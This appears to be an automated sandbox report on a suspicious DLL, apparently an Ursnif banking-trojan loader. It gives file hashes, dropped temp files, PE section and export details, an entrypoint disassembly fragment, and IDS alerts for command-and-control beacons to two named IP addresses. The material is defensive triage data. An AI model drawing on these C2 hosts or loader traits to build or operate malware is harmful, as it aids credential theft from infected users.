                                                    SHA-512:4216422EDC084CBB1D00F4D804612BBD4DEF4E33486F360CF9311CCA4E5EA4B2EAA9AB9A624E9177E1074C4C00E7AC870B92E32EDBD82DF37A589F2FCE35E0D5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Temp\~DF9102EC45A64E1E43.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39601
                                                    Entropy (8bit):0.5639045151385745
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+pWSYpycLq0UcLq0UMLq0Ut:kBqoxKAuqR+pWSYpyc2c2M2t
                                                    MD5:0E9369C76BD9BFFF488F3992D0FE9BDA
                                                    SHA1:A3001B3353695EF2F9770DA7BC18E560AC9DDB92
                                                    SHA-256:1B3E5473B76C3B82E6E3CE57A80211F137479BB99BB6B7A7FD24961BBF0804B6
                                                    SHA-512:B7AF2676CB8C823CA8160459B8D35F0DAEA2331F615AB74E5B013A7163E2A6434A6FB8358D8655C31F4EAA59BCAACC875B37E549E19124178D3854FA60FF8882
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Temp\~DFD13F26D934E0A1F7.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39601
                                                    Entropy (8bit):0.5638931680694919
                                                    Encrypted:false
                                                    SSDEEP:192:kBqoxKAuqR+gWl3elP1VS1tk1VS1tE1VS1tF:kBqoxKAuqR+gWl3elP1gM1g81gd
                                                    MD5:8ACE6A3C030B1B2E635AD9BC07E7F9F7
                                                    SHA1:244E818098A194FFC3652957FFBA8E7E600BD496
                                                    SHA-256:98D0955F5599635A4D57B7ADA7C1DC105BA6023860D25245B40F71D849F00F97
                                                    SHA-512:6423A2D98559F84D894E138FCACE311CDCE18536785AE5FE04004341841FD113B3709CCF2C5BCC1A5EED7FC5CE1A2ADAC1D525AF3DE62B04DC8B2EEBA605D90A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Temp\~DFD220BA7F3D9FB6B4.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):34809
                                                    Entropy (8bit):0.43261492810716984
                                                    Encrypted:false
                                                    SSDEEP:48:kBqoxKAuvScS+8Wl7T6+I++YSh+7XOxIlrZzs:kBqoxKAuvScS+8WRT6hr87XOxIxds
                                                    MD5:3360A35A3957F87427995602AB920B6F
                                                    SHA1:F171F0EFA0B5E3BC8AEA91ACA46B59B00F6A1184
                                                    SHA-256:A7F6EE8DCDA2468056FD1ED600CAD1B8272A8A0F86E4841D244FFA7F9EFC8444
                                                    SHA-512:B02698174FAF10AC06C4927A7004A9DA3BB49EDA5F995BA98DB6E9ADEA98856E5B8EF7DEE28073097C1FB196C09F4D6FEB2770272A3C8E41BF8812D4B73B5031
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Temp\~DFF4812447DAB93837.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):22053
                                                    Entropy (8bit):3.070985808134526
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoIoWSwfSvvWdKInOejHtcSL1ShSESqSi:kBqoIoWSweYzli
                                                    MD5:B193702FD9A1BD6CB176758CCCE32640
                                                    SHA1:5848C137268A6F58AEB4078BE624F5200186BFB2
                                                    SHA-256:40467E8C233DF7D43FA8F878ECE37FEAAF64089679A87AACD1DCBF4A2CF9AE78
                                                    SHA-512:B78E4B2532D0E458925FDE8F6A4D5CC3C36D1BF365F0B2DC3396E72922877AFDFB342AE5B1ECD1836B10A63E988570A793701A605F94A11380EE95474B601FCD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Temp\~DFF6E4AABF0B887D06.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):368814
                                                    Entropy (8bit):3.2556853601384774
                                                    Encrypted:false
                                                    SSDEEP:3072:sZ/2Bfcdmu5kgTzGtXZ/2Bfc+mu5kgTzGt5Z/2Bfcdmu5kgTzGtMZ/2Bfc+mu5kn:F03P
                                                    MD5:D638C56272469617AC69CDB48B526ADC
                                                    SHA1:5F1083EAFE5DAB08CC894A8943FD5E10C6EFA00A
                                                    SHA-256:DCD998A9860CFB0334766EC51CEBBEC980D0CB762B2C3635E01D773138A151B9
                                                    SHA-512:F8AE57D32A728AEFD418A58DC11B7C07341889CA194EB5B228E993B9D49F3ADE652E2AD0368B7EEC3793F177F4A09511D49BC4E74A4437D4981F865E2366E872
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Local\Temp\~DFFCBD3BE53D547AFD.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39625
                                                    Entropy (8bit):0.5698558980029956
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+WWnDhAj1Hv2lJ5Hv2lJxHv2lJW:kBqoxKAuqR+WWDhAj1P2lHP2lvP2l0
                                                    MD5:0D9B0F76BBD9770B7F0F84D57CAD1FC6
                                                    SHA1:612F5BC7A64397AE25327AC6CF0E5473B89CD5D6
                                                    SHA-256:3B254F87C565755BDBF4310DD2B76BD9BEAC81BB586BE8B65D9937C5DADA628E
                                                    SHA-512:686632E90EF009AD58E8D1942A5036C21776D903C4C83493C7B87C69A5B7FF68FE7E6EBD43AF5AF0F8CE287C29AD7D752FD976B88D159B7EA0FBD097FD484A25
                                                    Malicious:false
                                                    Reputation:unknown
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FCLX7G9B8I9GZL4REK7F.temp
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3440
                                                    Entropy (8bit):3.191863225405466
                                                    Encrypted:false
                                                    SSDEEP:48:adiDoP4IHC9GrIoPAsASF2diDoP4IHh683GrIoPAczH:FoP4l9SvAJUoP4m3SvAG
                                                    MD5:A4D6CB78A92EE8DDEF2435BCB47C6B84
                                                    SHA1:B9118B09F3143440BABEF7BC5DDBC4E091177581
                                                    SHA-256:FC24D5DD426D5A106F7D43881A4BB6F932AB9BCB8812359A5B1DAA34482351A2
                                                    SHA-512:834C10460A3A66BBC0C0275A39BC4B8A72BEFA5CD8915FB0FB4115435B4558900DA54BFF9CB8311B757909AACDF04BCB09B8502683554FBB533EBC0A3CE553F2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...................................FL..................F.@.. .....@.>...v3........?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N2LHZI30ZDHRXE2DHFW6.temp
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3440
                                                    Entropy (8bit):3.193406842865962
                                                    Encrypted:false
                                                    SSDEEP:48:6diDoP4IHC9GrIoPAsASFWdiDoP4IHh683GrIoPAczH:loP4l9SvAJEoP4m3SvAG
                                                    MD5:D38E5F062785E537BCE73ADD7A9FEE11
                                                    SHA1:295574E7DEF964C85D05921FA1E13D22EBA9F9E3
                                                    SHA-256:21C3C1C52218C0B0464D977D6FC4E0D193DB46E813AC0FEB9B3F685C4E7DFD8D
                                                    SHA-512:434B6FE11919A0DC0767AB18FFA0D7EF16B96EFCD4F13203BEF7B002BDB8F41FC06CBC84480477AC16F37C00BD8CB29AF1FA50EC11EB43B5F810C7723BDBC6A2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...................................FL..................F.@.. .....@.>.....u.......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QZOSUZN4465XZ22XOQ3E.temp
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3440
                                                    Entropy (8bit):3.191863225405466
                                                    Encrypted:false
                                                    SSDEEP:48:adiDoP4IHC9GrIoPAsASF2diDoP4IHh683GrIoPAczH:FoP4l9SvAJUoP4m3SvAG
                                                    MD5:A4D6CB78A92EE8DDEF2435BCB47C6B84
                                                    SHA1:B9118B09F3143440BABEF7BC5DDBC4E091177581
                                                    SHA-256:FC24D5DD426D5A106F7D43881A4BB6F932AB9BCB8812359A5B1DAA34482351A2
                                                    SHA-512:834C10460A3A66BBC0C0275A39BC4B8A72BEFA5CD8915FB0FB4115435B4558900DA54BFF9CB8311B757909AACDF04BCB09B8502683554FBB533EBC0A3CE553F2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...................................FL..................F.@.. .....@.>...v3........?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                    Static File Info

                                                    General

                                                    File type:MS-DOS executable, MZ for MS-DOS
                                                    Entropy (8bit):6.4061376769323415
                                                    TrID:
                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                    • DOS Executable Generic (2002/1) 0.20%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:direction.dll
                                                    File size:258504
                                                    MD5:499200f6a8e223c057c6e16701740721
                                                    SHA1:ef46f9c62b94715b750173074c51100285ff6fe9
                                                    SHA256:d7e64f8e65ce586ce2f0a857810b2a23f85140bf5e52e5a824f09787fb2bf45e
                                                    SHA512:b32e3c480c7533d6fa745b3d22bf7d7bed1d0f52452b77c8232560e3d3e8979db53e0e45eb47e81757b6f20cfa01b20c55d5e63f423d89666ee74e6c9988a511
                                                    SSDEEP:3072:SEF7LCAtgVteclWZuw72sQI6ja4IyXBiGqfWOSi7NTk+0UylJm2os4nd41RgVTo6:SEFXKVteapw7SIJ4G9dpNyjmJLsRGPhz
                                                    File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!................d........ .......................................N..............................R......

                                                    File Icon

                                                    Icon Hash:9cdadaa6a6a6e400

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x10059964
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x10000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                    DLL Characteristics:
                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:d34313ce3555dec95480bcae2d5dea6b

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        inc eax
                                                        jmp 00007FB0F8AFEEF0h
                                                        int3
                                                        call 00007FB0F8AFD19Ah
                                                        push 1007E6EDh
                                                        push 00000000h
                                                        push 00000000h
                                                        push 00000000h
                                                        push 00000001h
                                                        call dword ptr [10062076h]
                                                        cmp eax, 00000000h
                                                        jne 00007FB0F8AF2CA7h
                                                        push 00000000h
                                                        call dword ptr [10062072h]
                                                        push dword ptr [1007F3F1h]
                                                        push 00000005h
                                                        push dword ptr [1007F45Bh]
                                                        push 0000001Ch
                                                        push dword ptr [ebp+0Ch]
                                                        push 10058F5Bh
                                                        ret
                                                        int3
                                                        int3
                                                        mov edi, dword ptr [esi]
                                                        sub esi, DA0AF43Ah
                                                        xor esi, dword ptr [1007EEC5h]
                                                        sub esi, 49h
                                                        mov dword ptr [1007F4D1h], esi
                                                        push 00000000h
                                                        push 1005E69Fh
                                                        ret
                                                        jmp 00007FB0F8AF81CBh
                                                        xor eax, ebp
                                                        lea ecx, dword ptr [ebp-24h]
                                                        add eax, 28h
                                                        mov dword ptr [1000D104h], 00000001h
                                                        int3
                                                        int3
                                                        add ecx, eax
                                                        int3
                                                        call 00007FB0F8AFC67Ch
                                                        pop ebx
                                                        int3
                                                        pop dword ptr [1000D210h]
                                                        xor ecx, eax
                                                        push 00000000h
                                                        push 00000000h
                                                        push 00000001h
                                                        call dword ptr [10062076h]
                                                        push 1005566Fh
                                                        ret
                                                        mov dword ptr [ebp-34h], eax
                                                        pop ecx
                                                        cmp dword ptr [ebp+08h], eax
                                                        je 00007FB0F8AFD459h
                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                        int3
                                                        and dword ptr [ebp-04h], 00000000h
                                                        int3
                                                        jmp 00007FB0F8AFD2D5h

                                                        Data Directories

                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x60f52 | 0x3f1 | .text
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x62082 | 0x28 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x85000 | 0x8ca5 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3ea00 | 0xffffffff |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8e000 | 0x1e10 | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x6206e | 0x14 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                        Sections

                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .unsooth | 0x1000 | 0x1be | 0x200 | False | 0.74609375 | data | 5.05965650539 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .prekind | 0x2000 | 0x5755 | 0x200 | False | 0.8359375 | data | 5.55991795387 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .aqueoig | 0x8000 | 0x56bb | 0x200 | False | 0.607421875 | data | 4.089974355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .spiritr | 0xe000 | 0x56b6 | 0x200 | False | 0.6171875 | data | 4.32537549194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .nectaro | 0x14000 | 0x5747 | 0x200 | False | 0.779296875 | data | 5.28600359483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .philolo | 0x1a000 | 0x191 | 0x200 | False | 0.6875 | data | 4.6969561979 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .pres | 0x1b000 | 0x19f | 0x200 | False | 0.703125 | data | 4.84520818639 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .outglad | 0x1c000 | 0x56f5 | 0x200 | False | 0.6796875 | data | 4.69557672384 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .pogonir | 0x22000 | 0xfc | 0x200 | False | 0.484375 | data | 3.3261397334 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .taurico | 0x23000 | 0x56cb | 0x200 | False | 0.650390625 | data | 4.40534616445 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .untar | 0x29000 | 0xec | 0x200 | False | 0.435546875 | data | 2.96362208909 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .muskroo | 0x2a000 | 0x5752 | 0x200 | False | 0.80859375 | data | 5.31594136919 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .cricoto | 0x30000 | 0x56f1 | 0x200 | False | 0.67578125 | data | 4.63187162043 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .breaghe | 0x36000 | 0x569b | 0x200 | False | 0.576171875 | data | 3.95722657349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .shunnab | 0x3c000 | 0x1f8 | 0x200 | False | 0.83203125 | data | 5.3891798566 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .hemaut | 0x3d000 | 0x190 | 0x200 | False | 0.677734375 | data | 4.65755245189 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .uncongr | 0x3e000 | 0x1b3 | 0x200 | False | 0.75 | data | 5.10140119986 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .tonner | 0x3f000 | 0x5723 | 0x200 | False | 0.75 | data | 5.11518896506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .jink | 0x45000 | 0x220 | 0x400 | False | 0.4326171875 | data | 3.53364999014 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .stirles | 0x46000 | 0x15f | 0x200 | False | 0.60546875 | DOS executable (COM) | 4.18109406994 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .imper | 0x47000 | 0x170 | 0x200 | False | 0.634765625 | data | 4.46625189416 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .unsubve | 0x48000 | 0x576f | 0x400 | False | 0.4345703125 | data | 3.47992565687 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .text | 0x4e000 | 0x1336b | 0x13400 | False | 0.55760450487 | data | 6.30608125945 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x62000 | 0xaa | 0x200 | False | 0.236328125 | data | 1.73649757383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0x63000 | 0x21a9b | 0x1c600 | False | 0.605004129956 | data | 6.00866637611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x85000 | 0x8ca5 | 0x8e00 | False | 0.217814700704 | data | 4.84189780533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0x8e000 | 0x1e10 | 0x2000 | False | 0.770629882812 | data | 6.65709646572 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_ICON | 0x852b0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                        RT_ICON | 0x85718 | 0x988 | data | English | United States
                                                        RT_ICON | 0x860a0 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x87148 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_ICON | 0x896f0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
                                                        RT_GROUP_ICON | 0x8d918 | 0x14 | data | English | United States
                                                        RT_GROUP_ICON | 0x8d92c | 0x14 | data | English | United States
                                                        RT_GROUP_ICON | 0x8d940 | 0x14 | data | English | United States
                                                        RT_GROUP_ICON | 0x8d954 | 0x14 | data | English | United States
                                                        RT_GROUP_ICON | 0x8d968 | 0x14 | data | English | United States
                                                        RT_VERSION | 0x8d97c | 0x1ac | data | English | United States
                                                        RT_MANIFEST | 0x8db28 | 0x17d | XML 1.0 document text | English | United States

                                                        Imports

                                                        DLL | Import
                                                        kernel32.dll | GetCommandLineW, GetModuleHandleA, VirtualProtectEx, LoadLibraryExA

                                                        Exports

                                                        Name | Ordinal | Address
                                                        Opisthotonos | 1 | 0x1004e30c
                                                        Hydrazo | 2 | 0x1004ef0d
                                                        Overlock | 3 | 0x1004f133
                                                        Automobilist | 4 | 0x1004f962
                                                        Swampland | 5 | 0x1004ff11
                                                        Subarachnoid | 6 | 0x1005073a
                                                        Bechained | 7 | 0x10050a1b
                                                        Unforeseenness | 8 | 0x10050aed
                                                        Incrimination | 9 | 0x100510d9
                                                        Oversystematic | 10 | 0x100512d7
                                                        Shieldless | 11 | 0x10051e20
                                                        Tsarevitch | 12 | 0x10051f58
                                                        Torchbearer | 13 | 0x10052094
                                                        Moler | 14 | 0x10052ba4
                                                        Hyperpigmented | 15 | 0x10053289
                                                        Adipous | 16 | 0x10053861
                                                        Undazzled | 17 | 0x100544c2
                                                        Peckishness | 18 | 0x10054739
                                                        Musophagidae | 19 | 0x10054bfd
                                                        Impracticability | 20 | 0x10054c91
                                                        Carcharodon | 21 | 0x10054d48
                                                        Abomine | 22 | 0x10055e47
                                                        DllRegisterServer | 23 | 0x10056267
                                                        Brachycranial | 24 | 0x10056458
                                                        Barraclade | 25 | 0x1005664c
                                                        Knag | 26 | 0x100573c6
                                                        Beplaided | 27 | 0x10057f05
                                                        Pasqueflower | 28 | 0x1005808c
                                                        Physophorous | 29 | 0x100581c4
                                                        Nationalistically | 30 | 0x1005923c
                                                        Ineligibly | 31 | 0x100594ed
                                                        Antrotome | 32 | 0x1005984c
                                                        Upways | 33 | 0x10059ec5
                                                        Erectility | 34 | 0x1005a062
                                                        DllUnregisterServer | 35 | 0x1005a223
                                                        Sinnable | 36 | 0x1005ac6b
                                                        Suomi | 37 | 0x1005b154
                                                        Assessionary | 38 | 0x1005b585
                                                        Muggins | 39 | 0x1005bd71
                                                        Velocipede | 40 | 0x1005c074
                                                        Superedify | 41 | 0x1005c67b
                                                        Sporotrichum | 42 | 0x1005c7ec
                                                        Petitional | 43 | 0x1005d155
                                                        Donee | 44 | 0x1005dbb0
                                                        Geullah | 45 | 0x1005dd49
                                                        Growan | 46 | 0x1005f4d3
                                                        Anilau | 47 | 0x10060230

                                                        Version Infos

                                                        Description | Data
                                                        InternalName | Undeemed
                                                        PrivateBuild | Undarkened
                                                        FileVersion | 3, 2, 7, 7
                                                        CompanyName | PROMT
                                                        Translation | 0x0409 0x04e4

                                                        Possible Origin

                                                        Language of compilation system | Country where language is spoken | Map
                                                        English | United States |

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                        07/27/21-10:56:42.528924 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49775 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:56:42.579535 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49776 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:56:42.657140 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49777 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:56:42.697464 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49778 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:56:42.835758 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49779 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:56:42.898239 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49780 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:56:42.957025 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49781 | 80 | 192.168.2.3 | 195.110.59.2
                                                        07/27/21-10:57:14.881390 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49793 | 80 | 192.168.2.3 | 162.255.119.73
                                                        07/27/21-10:57:15.112729 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49796 | 80 | 192.168.2.3 | 162.255.119.73
